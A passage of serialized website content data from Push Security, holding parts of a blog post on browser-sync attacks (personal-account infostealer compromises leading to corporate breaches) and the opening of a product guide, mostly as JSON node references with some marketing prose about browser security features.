pages).",[],{},{"nodeType":312,"data":5219,"content":5223},{"target":5220},{"sys":5221},{"id":5222,"type":317,"linkType":318},"7gNX2RXqB2NIf1tNnJBIFD",[],{"nodeType":178,"data":5225,"content":5226},{},[5227],{"nodeType":173,"value":5228,"marks":5229,"data":5230},"You can also see where those credentials have a vulnerability, such as a weak, breached, or reused password. In this scenario, we’re looking for credentials that have been leaked online, where an employee is signed into their work browser with a personal account, and profile sync is enabled. This could indicate that the user has been the victim of an infostealer compromise or malicious extension on their personal device.",[],{},{"nodeType":312,"data":5232,"content":5236},{"target":5233},{"sys":5234},{"id":5235,"type":317,"linkType":318},"1CBezYXZtlIVbReROF7QpK",[],{"nodeType":312,"data":5238,"content":5242},{"target":5239},{"sys":5240},{"id":5241,"type":317,"linkType":318},"4xs0WNCijnwnIVc0xqpUu9",[],{"nodeType":312,"data":5244,"content":5248},{"target":5245},{"sys":5246},{"id":5247,"type":317,"linkType":318},"8gVeg0IBB5EV17iBk6XP8",[],{"nodeType":231,"data":5250,"content":5251},{},[],{"nodeType":169,"data":5253,"content":5254},{},[5255],{"nodeType":173,"value":5256,"marks":5257,"data":5259},"Stop browser-based attacks with Push",[5258],{"type":370},{},{"nodeType":178,"data":5261,"content":5262},{},[5263],{"nodeType":173,"value":5264,"marks":5265,"data":5266},"Push Security's browser-based security platform detects and blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don't need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",[],{},{"nodeType":178,"data":5268,"content":5269},{},[5270,5273,5280,5283,5291,5294,5301],{"nodeType":173,"value":1451,"marks":5271,"data":5272},[],{},{"nodeType":186,"data":5274,"content":5275},{"uri":1456},[5276],{"nodeType":173,"value":1459,"marks":5277,"data":5279},[5278],{"type":194},{},{"nodeType":173,"value":2936,"marks":5281,"data":5282},[],{},{"nodeType":186,"data":5284,"content":5285},{"uri":3941},[5286],{"nodeType":173,"value":5287,"marks":5288,"data":5290},"view our demo library",[5289],{"type":194},{},{"nodeType":173,"value":3949,"marks":5292,"data":5293},[],{},{"nodeType":186,"data":5295,"content":5296},{"uri":1469},[5297],{"nodeType":173,"value":1472,"marks":5298,"data":5300},[5299],{"type":194},{},{"nodeType":173,"value":1477,"marks":5302,"data":5303},[],{},{"entries":5305},{"hyperlink":5306,"inline":5307,"block":5308},[],[],[5309,5324,5343,5352,5360,5367,5393,5401,5406,5432],{"sys":5310,"__typename":5311,"content":5312,"name":5323,"title":118},{"id":4833},"InsightTextBlockComponent",{"json":5313},{"data":5314,"content":5315,"nodeType":165},{},[5316],{"data":5317,"content":5318,"nodeType":178},{},[5319],{"data":5320,"marks":5321,"value":5322,"nodeType":173},{},[],"This is the same for most browser-based attacks, like phishing (of multiple varieties, with AITM phishing and device code phishing being the most common in 2026), and even hybrid attacks like ClickFix (trick victim into installing an infostealer on their device > steal credentials and cookies > log into apps). ","Browser Sync Blog IB1",{"sys":5325,"__typename":5311,"content":5326,"name":5342,"title":118},{"id":4916},{"json":5327},{"nodeType":165,"data":5328,"content":5329},{},[5330],{"nodeType":178,"data":5331,"content":5332},{},[5333,5337],{"nodeType":173,"value":5334,"marks":5335,"data":5336},"Personal devices are far softer targets than corporate endpoints. They typically have no EDR agent, no centrally managed antivirus, no hardened configuration baselines, and no security operations team watching for alerts. And personal browsing habits are way more likely to lead to infostealer deployment, which are often distributed through malicious advertisements on all manner of platforms — search results, social media ads, gaming forums, and so on. ",[],{},{"nodeType":173,"value":5338,"marks":5339,"data":5341},"Notably, the 2025 Verizon DBIR found that 46% of infostealer-infected systems with compromised corporate credentials were non-managed devices. ",[5340],{"type":370},{},"Browser Sync Blog IB2",{"sys":5344,"__typename":5345,"title":5346,"caption":5347,"layoutMode":118,"file":5348},{"id":4946},"Image","Browser sync attack diagram","How a personal account compromise can lead to a corporate breach.",{"url":5349,"width":5350,"height":5351},"https://images.ctfassets.net/y1cdw1ablpvd/7KIXnq2SeCTN2zA7DoIOj4/f2b7c37c47d28ac110cd2769c35652ae/Browser_sync_attack_diagram.png",3922,1636,{"sys":5353,"__typename":5345,"title":5354,"caption":5355,"layoutMode":118,"file":5356},{"id":5159},"Preventing browser profile syncing in Chrome","Preventing browser profile syncing in Chrome.",{"url":5357,"width":5358,"height":5359},"https://images.ctfassets.net/y1cdw1ablpvd/54OsAScfL5a896m3n0is80/ee84ec32221be0a6342eb6792c8b6dca/image1.png",1999,1054,{"sys":5361,"__typename":5345,"title":5362,"caption":5362,"layoutMode":118,"file":5363},{"id":5196},"Identify profile syncing using Push.",{"url":5364,"width":5365,"height":5366},"https://images.ctfassets.net/y1cdw1ablpvd/7Gmo7lSxoyLpmRyeEbXz4H/10e82ddfcba7a390ee5a25c931f730ff/image3.png",1380,465,{"sys":5368,"__typename":5311,"content":5369,"name":5392,"title":118},{"id":5209},{"json":5370},{"data":5371,"content":5372,"nodeType":165},{},[5373],{"data":5374,"content":5375,"nodeType":178},{},[5376,5380,5388],{"data":5377,"marks":5378,"value":5379,"nodeType":173},{},[],"To learn more about how you can use Push to lock down extension use and block malicious extensions from running across every browser, check out our ",{"data":5381,"content":5382,"nodeType":186},{"uri":4803},[5383],{"data":5384,"marks":5385,"value":5387,"nodeType":173},{},[5386],{"type":194},"guide",{"data":5389,"marks":5390,"value":5391,"nodeType":173},{},[]," here. ","Browser Sync Blog IB3",{"sys":5394,"__typename":5345,"title":5395,"caption":5396,"layoutMode":118,"file":5397},{"id":5222},"Get detailed visibility of password manager use and password entry behavior.","Get deep visibility of password manager use and password entry behavior.",{"url":5398,"width":5399,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/74hJdhrMBMXv0enE2Qs5VD/2cdff9be14f70d2ae2283b88da0f3eeb/Push_Password_Manager.gif",1280,720,{"sys":5402,"__typename":5345,"title":5403,"caption":5403,"layoutMode":118,"file":5404},{"id":5235},"Identify browser profile syncing and whether the user has active credentials that have been leaked online.",{"url":5405,"width":5399,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/3BIn8peNvp8EXo1TWqZqXO/0c3f849f24d60fa546603d12abd4c349/Browser_Profile_Sync.gif",{"sys":5407,"__typename":5311,"content":5408,"name":5431,"title":118},{"id":5241},{"json":5409},{"data":5410,"content":5411,"nodeType":165},{},[5412],{"data":5413,"content":5414,"nodeType":178},{},[5415,5419,5427],{"data":5416,"marks":5417,"value":5418,"nodeType":173},{},[],"As well as identifying password vulnerabilities, you can also use Push to harden accounts by detecting MFA gaps and enforcing MFA (even on apps where this isn’t natively possible). Check out our ",{"data":5420,"content":5422,"nodeType":186},{"uri":5421},"https://pushsecurity.com/blog/guide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks/",[5423],{"data":5424,"marks":5425,"value":5387,"nodeType":173},{},[5426],{"type":194},{"data":5428,"marks":5429,"value":5430,"nodeType":173},{},[]," for more information.","Browser Sync Blog IB4",{"sys":5433,"__typename":5434,"title":5435,"arcadeDemoUrl":5436,"playText":5437},{"id":5247},"ArcadeDemo","Find and fix vulnerabilities using Push to harden attack paths.","https://demo.arcade.software/3gsvKeVcdatDBiW7oC9g?embed","2 mins","content:blog:browser-sync-attacks-where-personal-account-hacks-lead-to-corporate-breaches.json","json","content","blog/browser-sync-attacks-where-personal-account-hacks-lead-to-corporate-breaches.json","blog/browser-sync-attacks-where-personal-account-hacks-lead-to-corporate-breaches",{"_path":5444,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":5445,"ogImage":118,"summary":5447,"relatedBlogPostsCollection":5458,"title":2895,"subtitle":118,"metaTitle":5460,"synopsis":2896,"hashTags":118,"publishedDate":2897,"slug":2898,"tagsCollection":5461,"authorsCollection":5467,"content":5471,"_id":6886,"_type":5439,"_source":5440,"_file":6887,"_stem":6888,"_extension":5439},"/blog/guide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks",{"id":1530,"publishedAt":5446},"2026-04-14T13:05:52.799Z",{"json":5448},{"data":5449,"content":5450,"nodeType":165},{},[5451],{"data":5452,"content":5453,"nodeType":178},{},[5454],{"data":5455,"marks":5456,"value":5457,"nodeType":173},{},[],"If you want to protect employees working in the browser, you need to get as close to the user as possible. In this Push product guide, we’ll cover how to use in-browser controls to stop attacks before compromise can occur, and to guide users to remediate vulnerabilities — all using your custom branding to increase trust.",{"items":5459},[],"Guide: How to use Push to protect users from browser threats",{"items":5462},[5463,5465],{"sys":5464,"name":505},{"id":504},{"sys":5466,"name":509},{"id":508},{"items":5468},[5469],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":5470},{"url":2911},{"json":5472,"links":6633},{"nodeType":165,"data":5473,"content":5474},{},[5475,5481,5502,5508,5513,5519,5525,5531,5536,5539,5546,5552,5557,5562,5575,5756,5766,5773,5779,5785,5791,5807,5812,5818,5821,5828,5834,5863,5869,5882,5899,5927,5932,5938,5953,5959,5965,5968,5975,5981,6064,6070,6076,6083,6089,6095,6101,6106,6113,6119,6125,6131,6136,6142,6149,6164,6171,6177,6182,6185,6192,6198,6204,6298,6304,6311,6317,6323,6329,6335,6342,6348,6354,6374,6379,6392,6405,6418,6423,6430,6436,6443,6449,6452,6459,6465,6492,6497,6517,6523,6526,6533,6539,6552,6557,6563,6569,6572,6579,6594,6600],{"nodeType":178,"data":5476,"content":5477},{},[5478],{"nodeType":173,"value":1539,"marks":5479,"data":5480},[],{},{"nodeType":250,"data":5482,"content":5483},{},[5484,5493],{"nodeType":254,"data":5485,"content":5486},{},[5487],{"nodeType":178,"data":5488,"content":5489},{},[5490],{"nodeType":173,"value":1552,"marks":5491,"data":5492},[],{},{"nodeType":254,"data":5494,"content":5495},{},[5496],{"nodeType":178,"data":5497,"content":5498},{},[5499],{"nodeType":173,"value":1562,"marks":5500,"data":5501},[],{},{"nodeType":178,"data":5503,"content":5504},{},[5505],{"nodeType":173,"value":1569,"marks":5506,"data":5507},[],{},{"nodeType":312,"data":5509,"content":5512},{"target":5510},{"sys":5511},{"id":1576,"type":317,"linkType":318},[],{"nodeType":178,"data":5514,"content":5515},{},[5516],{"nodeType":173,"value":1582,"marks":5517,"data":5518},[],{},{"nodeType":178,"data":5520,"content":5521},{},[5522],{"nodeType":173,"value":1589,"marks":5523,"data":5524},[],{},{"nodeType":178,"data":5526,"content":5527},{},[5528],{"nodeType":173,"value":1596,"marks":5529,"data":5530},[],{},{"nodeType":312,"data":5532,"content":5535},{"target":5533},{"sys":5534},{"id":1603,"type":317,"linkType":318},[],{"nodeType":231,"data":5537,"content":5538},{},[],{"nodeType":169,"data":5540,"content":5541},{},[5542],{"nodeType":173,"value":1612,"marks":5543,"data":5545},[5544],{"type":370},{},{"nodeType":178,"data":5547,"content":5548},{},[5549],{"nodeType":173,"value":1620,"marks":5550,"data":5551},[],{},{"nodeType":312,"data":5553,"content":5556},{"target":5554},{"sys":5555},{"id":1627,"type":317,"linkType":318},[],{"nodeType":312,"data":5558,"content":5561},{"target":5559},{"sys":5560},{"id":1633,"type":317,"linkType":318},[],{"nodeType":178,"data":5563,"content":5564},{},[5565,5568,5572],{"nodeType":173,"value":1639,"marks":5566,"data":5567},[],{},{"nodeType":173,"value":1643,"marks":5569,"data":5571},[5570],{"type":1646},{},{"nodeType":173,"value":1649,"marks":5573,"data":5574},[],{},{"nodeType":1653,"data":5576,"content":5577},{},[5578,5601,5636,5657,5687,5717],{"nodeType":1657,"data":5579,"content":5580},{},[5581,5591],{"nodeType":1661,"data":5582,"content":5583},{},[5584],{"nodeType":178,"data":5585,"content":5586},{},[5587],{"nodeType":173,"value":1668,"marks":5588,"data":5590},[5589],{"type":370},{},{"nodeType":1661,"data":5592,"content":5593},{},[5594],{"nodeType":178,"data":5595,"content":5596},{},[5597],{"nodeType":173,"value":1679,"marks":5598,"data":5600},[5599],{"type":370},{},{"nodeType":1657,"data":5602,"content":5603},{},[5604,5624],{"nodeType":1687,"data":5605,"content":5606},{},[5607],{"nodeType":178,"data":5608,"content":5609},{},[5610,5613,5621],{"nodeType":173,"value":1694,"marks":5611,"data":5612},[],{},{"nodeType":1698,"data":5614,"content":5617},{"target":5615},{"sys":5616},{"id":1702,"type":317,"linkType":318},[5618],{"nodeType":173,"value":1705,"marks":5619,"data":5620},[],{},{"nodeType":173,"value":1709,"marks":5622,"data":5623},[],{},{"nodeType":1687,"data":5625,"content":5626},{},[5627],{"nodeType":178,"data":5628,"content":5629},{},[5630,5633],{"nodeType":173,"value":1719,"marks":5631,"data":5632},[],{},{"nodeType":173,"value":1723,"marks":5634,"data":5635},[],{},{"nodeType":1657,"data":5637,"content":5638},{},[5639,5648],{"nodeType":1687,"data":5640,"content":5641},{},[5642],{"nodeType":178,"data":5643,"content":5644},{},[5645],{"nodeType":173,"value":1736,"marks":5646,"data":5647},[],{},{"nodeType":1687,"data":5649,"content":5650},{},[5651],{"nodeType":178,"data":5652,"content":5653},{},[5654],{"nodeType":173,"value":1746,"marks":5655,"data":5656},[],{},{"nodeType":1657,"data":5658,"content":5659},{},[5660,5678],{"nodeType":1687,"data":5661,"content":5662},{},[5663],{"nodeType":178,"data":5664,"content":5665},{},[5666,5669,5675],{"nodeType":173,"value":1759,"marks":5667,"data":5668},[],{},{"nodeType":186,"data":5670,"content":5671},{"uri":1764},[5672],{"nodeType":173,"value":1767,"marks":5673,"data":5674},[],{},{"nodeType":173,"value":1771,"marks":5676,"data":5677},[],{},{"nodeType":1687,"data":5679,"content":5680},{},[5681],{"nodeType":178,"data":5682,"content":5683},{},[5684],{"nodeType":173,"value":1781,"marks":5685,"data":5686},[],{},{"nodeType":1657,"data":5688,"content":5689},{},[5690,5699],{"nodeType":1687,"data":5691,"content":5692},{},[5693],{"nodeType":178,"data":5694,"content":5695},{},[5696],{"nodeType":173,"value":1794,"marks":5697,"data":5698},[],{},{"nodeType":1687,"data":5700,"content":5701},{},[5702],{"nodeType":178,"data":5703,"content":5704},{},[5705,5708,5714],{"nodeType":173,"value":1804,"marks":5706,"data":5707},[],{},{"nodeType":186,"data":5709,"content":5710},{"uri":1809},[5711],{"nodeType":173,"value":1812,"marks":5712,"data":5713},[],{},{"nodeType":173,"value":1477,"marks":5715,"data":5716},[],{},{"nodeType":1657,"data":5718,"content":5719},{},[5720,5729],{"nodeType":1687,"data":5721,"content":5722},{},[5723],{"nodeType":178,"data":5724,"content":5725},{},[5726],{"nodeType":173,"value":1828,"marks":5727,"data":5728},[],{},{"nodeType":1687,"data":5730,"content":5731},{},[5732],{"nodeType":178,"data":5733,"content":5734},{},[5735,5738,5744,5747,5753],{"nodeType":173,"value":37,"marks":5736,"data":5737},[],{},{"nodeType":186,"data":5739,"content":5740},{"uri":1842},[5741],{"nodeType":173,"value":1845,"marks":5742,"data":5743},[],{},{"nodeType":173,"value":1849,"marks":5745,"data":5746},[],{},{"nodeType":186,"data":5748,"content":5749},{"uri":1854},[5750],{"nodeType":173,"value":1857,"marks":5751,"data":5752},[],{},{"nodeType":173,"value":1861,"marks":5754,"data":5755},[],{},{"nodeType":178,"data":5757,"content":5758},{},[5759,5762],{"nodeType":173,"value":1868,"marks":5760,"data":5761},[],{},{"nodeType":173,"value":1872,"marks":5763,"data":5765},[5764],{"type":370},{},{"nodeType":235,"data":5767,"content":5768},{},[5769],{"nodeType":173,"value":1880,"marks":5770,"data":5772},[5771],{"type":370},{},{"nodeType":178,"data":5774,"content":5775},{},[5776],{"nodeType":173,"value":1888,"marks":5777,"data":5778},[],{},{"nodeType":178,"data":5780,"content":5781},{},[5782],{"nodeType":173,"value":1895,"marks":5783,"data":5784},[],{},{"nodeType":178,"data":5786,"content":5787},{},[5788],{"nodeType":173,"value":1902,"marks":5789,"data":5790},[],{},{"nodeType":178,"data":5792,"content":5793},{},[5794,5797,5800,5804],{"nodeType":173,"value":1909,"marks":5795,"data":5796},[],{},{"nodeType":173,"value":1913,"marks":5798,"data":5799},[],{},{"nodeType":173,"value":1917,"marks":5801,"data":5803},[5802],{"type":370},{},{"nodeType":173,"value":1922,"marks":5805,"data":5806},[],{},{"nodeType":312,"data":5808,"content":5811},{"target":5809},{"sys":5810},{"id":1929,"type":317,"linkType":318},[],{"nodeType":178,"data":5813,"content":5814},{},[5815],{"nodeType":173,"value":1935,"marks":5816,"data":5817},[],{},{"nodeType":231,"data":5819,"content":5820},{},[],{"nodeType":169,"data":5822,"content":5823},{},[5824],{"nodeType":173,"value":1945,"marks":5825,"data":5827},[5826],{"type":370},{},{"nodeType":178,"data":5829,"content":5830},{},[5831],{"nodeType":173,"value":1953,"marks":5832,"data":5833},[],{},{"nodeType":250,"data":5835,"content":5836},{},[5837,5850],{"nodeType":254,"data":5838,"content":5839},{},[5840],{"nodeType":178,"data":5841,"content":5842},{},[5843,5847],{"nodeType":173,"value":1966,"marks":5844,"data":5846},[5845],{"type":370},{},{"nodeType":173,"value":1971,"marks":5848,"data":5849},[],{},{"nodeType":254,"data":5851,"content":5852},{},[5853],{"nodeType":178,"data":5854,"content":5855},{},[5856,5860],{"nodeType":173,"value":1981,"marks":5857,"data":5859},[5858],{"type":370},{},{"nodeType":173,"value":1986,"marks":5861,"data":5862},[],{},{"nodeType":235,"data":5864,"content":5865},{},[5866],{"nodeType":173,"value":1993,"marks":5867,"data":5868},[],{},{"nodeType":178,"data":5870,"content":5871},{},[5872,5875,5879],{"nodeType":173,"value":2000,"marks":5873,"data":5874},[],{},{"nodeType":173,"value":2004,"marks":5876,"data":5878},[5877],{"type":1646},{},{"nodeType":173,"value":2009,"marks":5880,"data":5881},[],{},{"nodeType":178,"data":5883,"content":5884},{},[5885,5888,5896],{"nodeType":173,"value":2016,"marks":5886,"data":5887},[],{},{"nodeType":1698,"data":5889,"content":5892},{"target":5890},{"sys":5891},{"id":2023,"type":317,"linkType":318},[5893],{"nodeType":173,"value":2026,"marks":5894,"data":5895},[],{},{"nodeType":173,"value":2030,"marks":5897,"data":5898},[],{},{"nodeType":178,"data":5900,"content":5901},{},[5902,5905,5913,5916,5924],{"nodeType":173,"value":2037,"marks":5903,"data":5904},[],{},{"nodeType":1698,"data":5906,"content":5909},{"target":5907},{"sys":5908},{"id":2044,"type":317,"linkType":318},[5910],{"nodeType":173,"value":2047,"marks":5911,"data":5912},[],{},{"nodeType":173,"value":2051,"marks":5914,"data":5915},[],{},{"nodeType":1698,"data":5917,"content":5920},{"target":5918},{"sys":5919},{"id":2058,"type":317,"linkType":318},[5921],{"nodeType":173,"value":2061,"marks":5922,"data":5923},[],{},{"nodeType":173,"value":2065,"marks":5925,"data":5926},[],{},{"nodeType":312,"data":5928,"content":5931},{"target":5929},{"sys":5930},{"id":2072,"type":317,"linkType":318},[],{"nodeType":235,"data":5933,"content":5934},{},[5935],{"nodeType":173,"value":2078,"marks":5936,"data":5937},[],{},{"nodeType":178,"data":5939,"content":5940},{},[5941,5944,5950],{"nodeType":173,"value":2085,"marks":5942,"data":5943},[],{},{"nodeType":186,"data":5945,"content":5946},{"uri":2090},[5947],{"nodeType":173,"value":2093,"marks":5948,"data":5949},[],{},{"nodeType":173,"value":2097,"marks":5951,"data":5952},[],{},{"nodeType":178,"data":5954,"content":5955},{},[5956],{"nodeType":173,"value":2104,"marks":5957,"data":5958},[],{},{"nodeType":178,"data":5960,"content":5961},{},[5962],{"nodeType":173,"value":2111,"marks":5963,"data":5964},[],{},{"nodeType":231,"data":5966,"content":5967},{},[],{"nodeType":169,"data":5969,"content":5970},{},[5971],{"nodeType":173,"value":2121,"marks":5972,"data":5974},[5973],{"type":370},{},{"nodeType":178,"data":5976,"content":5977},{},[5978],{"nodeType":173,"value":2129,"marks":5979,"data":5980},[],{},{"nodeType":250,"data":5982,"content":5983},{},[5984,6004,6024,6044],{"nodeType":254,"data":5985,"content":5986},{},[5987],{"nodeType":178,"data":5988,"content":5989},{},[5990,5993,6001],{"nodeType":173,"value":37,"marks":5991,"data":5992},[],{},{"nodeType":1698,"data":5994,"content":5997},{"target":5995},{"sys":5996},{"id":2148,"type":317,"linkType":318},[5998],{"nodeType":173,"value":2151,"marks":5999,"data":6000},[],{},{"nodeType":173,"value":2155,"marks":6002,"data":6003},[],{},{"nodeType":254,"data":6005,"content":6006},{},[6007],{"nodeType":178,"data":6008,"content":6009},{},[6010,6013,6021],{"nodeType":173,"value":37,"marks":6011,"data":6012},[],{},{"nodeType":1698,"data":6014,"content":6017},{"target":6015},{"sys":6016},{"id":2171,"type":317,"linkType":318},[6018],{"nodeType":173,"value":2174,"marks":6019,"data":6020},[],{},{"nodeType":173,"value":2178,"marks":6022,"data":6023},[],{},{"nodeType":254,"data":6025,"content":6026},{},[6027],{"nodeType":178,"data":6028,"content":6029},{},[6030,6033,6041],{"nodeType":173,"value":37,"marks":6031,"data":6032},[],{},{"nodeType":1698,"data":6034,"content":6037},{"target":6035},{"sys":6036},{"id":2194,"type":317,"linkType":318},[6038],{"nodeType":173,"value":1186,"marks":6039,"data":6040},[],{},{"nodeType":173,"value":37,"marks":6042,"data":6043},[],{},{"nodeType":254,"data":6045,"content":6046},{},[6047],{"nodeType":178,"data":6048,"content":6049},{},[6050,6053,6061],{"nodeType":173,"value":37,"marks":6051,"data":6052},[],{},{"nodeType":1698,"data":6054,"content":6057},{"target":6055},{"sys":6056},{"id":2215,"type":317,"linkType":318},[6058],{"nodeType":173,"value":2218,"marks":6059,"data":6060},[],{},{"nodeType":173,"value":2222,"marks":6062,"data":6063},[],{},{"nodeType":178,"data":6065,"content":6066},{},[6067],{"nodeType":173,"value":2229,"marks":6068,"data":6069},[],{},{"nodeType":178,"data":6071,"content":6072},{},[6073],{"nodeType":173,"value":2236,"marks":6074,"data":6075},[],{},{"nodeType":235,"data":6077,"content":6078},{},[6079],{"nodeType":173,"value":2243,"marks":6080,"data":6082},[6081],{"type":370},{},{"nodeType":178,"data":6084,"content":6085},{},[6086],{"nodeType":173,"value":2251,"marks":6087,"data":6088},[],{},{"nodeType":178,"data":6090,"content":6091},{},[6092],{"nodeType":173,"value":2258,"marks":6093,"data":6094},[],{},{"nodeType":178,"data":6096,"content":6097},{},[6098],{"nodeType":173,"value":2265,"marks":6099,"data":6100},[],{},{"nodeType":312,"data":6102,"content":6105},{"target":6103},{"sys":6104},{"id":2272,"type":317,"linkType":318},[],{"nodeType":235,"data":6107,"content":6108},{},[6109],{"nodeType":173,"value":2278,"marks":6110,"data":6112},[6111],{"type":370},{},{"nodeType":178,"data":6114,"content":6115},{},[6116],{"nodeType":173,"value":2286,"marks":6117,"data":6118},[],{},{"nodeType":178,"data":6120,"content":6121},{},[6122],{"nodeType":173,"value":2293,"marks":6123,"data":6124},[],{},{"nodeType":178,"data":6126,"content":6127},{},[6128],{"nodeType":173,"value":2300,"marks":6129,"data":6130},[],{},{"nodeType":312,"data":6132,"content":6135},{"target":6133},{"sys":6134},{"id":2307,"type":317,"linkType":318},[],{"nodeType":178,"data":6137,"content":6138},{},[6139],{"nodeType":173,"value":2313,"marks":6140,"data":6141},[],{},{"nodeType":235,"data":6143,"content":6144},{},[6145],{"nodeType":173,"value":2320,"marks":6146,"data":6148},[6147],{"type":370},{},{"nodeType":178,"data":6150,"content":6151},{},[6152,6155,6161],{"nodeType":173,"value":2328,"marks":6153,"data":6154},[],{},{"nodeType":186,"data":6156,"content":6157},{"uri":2333},[6158],{"nodeType":173,"value":2336,"marks":6159,"data":6160},[],{},{"nodeType":173,"value":2340,"marks":6162,"data":6163},[],{},{"nodeType":235,"data":6165,"content":6166},{},[6167],{"nodeType":173,"value":2347,"marks":6168,"data":6170},[6169],{"type":370},{},{"nodeType":178,"data":6172,"content":6173},{},[6174],{"nodeType":173,"value":2355,"marks":6175,"data":6176},[],{},{"nodeType":312,"data":6178,"content":6181},{"target":6179},{"sys":6180},{"id":2362,"type":317,"linkType":318},[],{"nodeType":231,"data":6183,"content":6184},{},[],{"nodeType":169,"data":6186,"content":6187},{},[6188],{"nodeType":173,"value":2371,"marks":6189,"data":6191},[6190],{"type":370},{},{"nodeType":178,"data":6193,"content":6194},{},[6195],{"nodeType":173,"value":2379,"marks":6196,"data":6197},[],{},{"nodeType":178,"data":6199,"content":6200},{},[6201],{"nodeType":173,"value":2386,"marks":6202,"data":6203},[],{},{"nodeType":250,"data":6205,"content":6206},{},[6207,6227,6258,6278],{"nodeType":254,"data":6208,"content":6209},{},[6210],{"nodeType":178,"data":6211,"content":6212},{},[6213,6216,6224],{"nodeType":173,"value":37,"marks":6214,"data":6215},[],{},{"nodeType":1698,"data":6217,"content":6220},{"target":6218},{"sys":6219},{"id":2405,"type":317,"linkType":318},[6221],{"nodeType":173,"value":2408,"marks":6222,"data":6223},[],{},{"nodeType":173,"value":2412,"marks":6225,"data":6226},[],{},{"nodeType":254,"data":6228,"content":6229},{},[6230],{"nodeType":178,"data":6231,"content":6232},{},[6233,6236,6244,6247,6255],{"nodeType":173,"value":2422,"marks":6234,"data":6235},[],{},{"nodeType":1698,"data":6237,"content":6240},{"target":6238},{"sys":6239},{"id":2429,"type":317,"linkType":318},[6241],{"nodeType":173,"value":2432,"marks":6242,"data":6243},[],{},{"nodeType":173,"value":1464,"marks":6245,"data":6246},[],{},{"nodeType":1698,"data":6248,"content":6251},{"target":6249},{"sys":6250},{"id":2442,"type":317,"linkType":318},[6252],{"nodeType":173,"value":2445,"marks":6253,"data":6254},[],{},{"nodeType":173,"value":2449,"marks":6256,"data":6257},[],{},{"nodeType":254,"data":6259,"content":6260},{},[6261],{"nodeType":178,"data":6262,"content":6263},{},[6264,6267,6275],{"nodeType":173,"value":2459,"marks":6265,"data":6266},[],{},{"nodeType":1698,"data":6268,"content":6271},{"target":6269},{"sys":6270},{"id":2466,"type":317,"linkType":318},[6272],{"nodeType":173,"value":2469,"marks":6273,"data":6274},[],{},{"nodeType":173,"value":2473,"marks":6276,"data":6277},[],{},{"nodeType":254,"data":6279,"content":6280},{},[6281],{"nodeType":178,"data":6282,"content":6283},{},[6284,6287,6295],{"nodeType":173,"value":37,"marks":6285,"data":6286},[],{},{"nodeType":1698,"data":6288,"content":6291},{"target":6289},{"sys":6290},{"id":2489,"type":317,"linkType":318},[6292],{"nodeType":173,"value":2492,"marks":6293,"data":6294},[],{},{"nodeType":173,"value":2496,"marks":6296,"data":6297},[],{},{"nodeType":178,"data":6299,"content":6300},{},[6301],{"nodeType":173,"value":2236,"marks":6302,"data":6303},[],{},{"nodeType":235,"data":6305,"content":6306},{},[6307],{"nodeType":173,"value":2243,"marks":6308,"data":6310},[6309],{"type":370},{},{"nodeType":178,"data":6312,"content":6313},{},[6314],{"nodeType":173,"value":2516,"marks":6315,"data":6316},[],{},{"nodeType":178,"data":6318,"content":6319},{},[6320],{"nodeType":173,"value":2523,"marks":6321,"data":6322},[],{},{"nodeType":178,"data":6324,"content":6325},{},[6326],{"nodeType":173,"value":2530,"marks":6327,"data":6328},[],{},{"nodeType":178,"data":6330,"content":6331},{},[6332],{"nodeType":173,"value":2537,"marks":6333,"data":6334},[],{},{"nodeType":235,"data":6336,"content":6337},{},[6338],{"nodeType":173,"value":2544,"marks":6339,"data":6341},[6340],{"type":370},{},{"nodeType":178,"data":6343,"content":6344},{},[6345],{"nodeType":173,"value":2552,"marks":6346,"data":6347},[],{},{"nodeType":178,"data":6349,"content":6350},{},[6351],{"nodeType":173,"value":2559,"marks":6352,"data":6353},[],{},{"nodeType":178,"data":6355,"content":6356},{},[6357,6360,6364,6367,6371],{"nodeType":173,"value":2566,"marks":6358,"data":6359},[],{},{"nodeType":173,"value":2570,"marks":6361,"data":6363},[6362],{"type":370},{},{"nodeType":173,"value":933,"marks":6365,"data":6366},[],{},{"nodeType":173,"value":2578,"marks":6368,"data":6370},[6369],{"type":370},{},{"nodeType":173,"value":2583,"marks":6372,"data":6373},[],{},{"nodeType":312,"data":6375,"content":6378},{"target":6376},{"sys":6377},{"id":2590,"type":317,"linkType":318},[],{"nodeType":178,"data":6380,"content":6381},{},[6382,6385,6389],{"nodeType":173,"value":2596,"marks":6383,"data":6384},[],{},{"nodeType":173,"value":2600,"marks":6386,"data":6388},[6387],{"type":370},{},{"nodeType":173,"value":2605,"marks":6390,"data":6391},[],{},{"nodeType":178,"data":6393,"content":6394},{},[6395,6398,6402],{"nodeType":173,"value":2596,"marks":6396,"data":6397},[],{},{"nodeType":173,"value":2615,"marks":6399,"data":6401},[6400],{"type":370},{},{"nodeType":173,"value":2620,"marks":6403,"data":6404},[],{},{"nodeType":178,"data":6406,"content":6407},{},[6408,6411,6415],{"nodeType":173,"value":2627,"marks":6409,"data":6410},[],{},{"nodeType":173,"value":2631,"marks":6412,"data":6414},[6413],{"type":370},{},{"nodeType":173,"value":2636,"marks":6416,"data":6417},[],{},{"nodeType":312,"data":6419,"content":6422},{"target":6420},{"sys":6421},{"id":2643,"type":317,"linkType":318},[],{"nodeType":235,"data":6424,"content":6425},{},[6426],{"nodeType":173,"value":2649,"marks":6427,"data":6429},[6428],{"type":370},{},{"nodeType":178,"data":6431,"content":6432},{},[6433],{"nodeType":173,"value":2657,"marks":6434,"data":6435},[],{},{"nodeType":235,"data":6437,"content":6438},{},[6439],{"nodeType":173,"value":2664,"marks":6440,"data":6442},[6441],{"type":370},{},{"nodeType":178,"data":6444,"content":6445},{},[6446],{"nodeType":173,"value":2672,"marks":6447,"data":6448},[],{},{"nodeType":231,"data":6450,"content":6451},{},[],{"nodeType":169,"data":6453,"content":6454},{},[6455],{"nodeType":173,"value":2682,"marks":6456,"data":6458},[6457],{"type":370},{},{"nodeType":178,"data":6460,"content":6461},{},[6462],{"nodeType":173,"value":2690,"marks":6463,"data":6464},[],{},{"nodeType":178,"data":6466,"content":6467},{},[6468,6471,6475,6478,6482,6485,6489],{"nodeType"